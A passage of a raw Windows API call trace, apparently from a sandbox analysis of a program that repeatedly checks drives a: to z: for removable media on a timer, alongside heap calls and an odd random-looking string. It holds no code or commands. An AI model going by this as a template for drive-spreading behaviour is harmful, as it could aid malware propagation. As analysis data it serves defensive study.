Flags=0x0, Size=0x20) returned 0x12fee70 [0216.158] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.158] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0216.158] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.158] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.158] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0216.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0216.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0216.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0216.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0216.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0216.159] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.160] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.160] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.160] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.160] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0216.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.161] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.161] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0216.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.161] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0216.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.161] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0216.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0216.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.162] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.162] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.162] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.162] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.162] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.163] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.163] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.163] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.163] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.163] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.163] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.164] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.164] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.164] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.164] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.165] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.165] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.165] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.165] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.166] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.166] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.166] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.166] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.167] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.167] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.167] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.167] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.169] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0216.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325ea0 [0216.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325ea0 | out: hHeap=0x12c0000) returned 1 [0216.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0216.170] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.170] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.170] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.170] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.170] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.171] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0216.171] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0216.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.171] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.171] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.171] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0216.172] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0216.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0216.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0216.172] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.172] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.172] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.173] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.173] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.173] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.173] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.173] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.174] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.174] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.174] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.174] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.174] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.175] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.175] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.175] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.175] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.175] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.176] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.176] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.176] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.176] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.176] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.177] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.177] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.177] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.177] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0216.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0216.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.199] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.199] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.199] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0216.199] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.199] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0216.199] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.200] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.200] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.200] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.200] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0216.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0216.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.201] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.201] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.201] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.201] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.201] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.202] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0216.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.202] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0216.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0216.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0216.202] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.202] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.203] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.203] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.203] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.203] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.203] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.204] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.204] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.204] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.204] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.205] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.205] 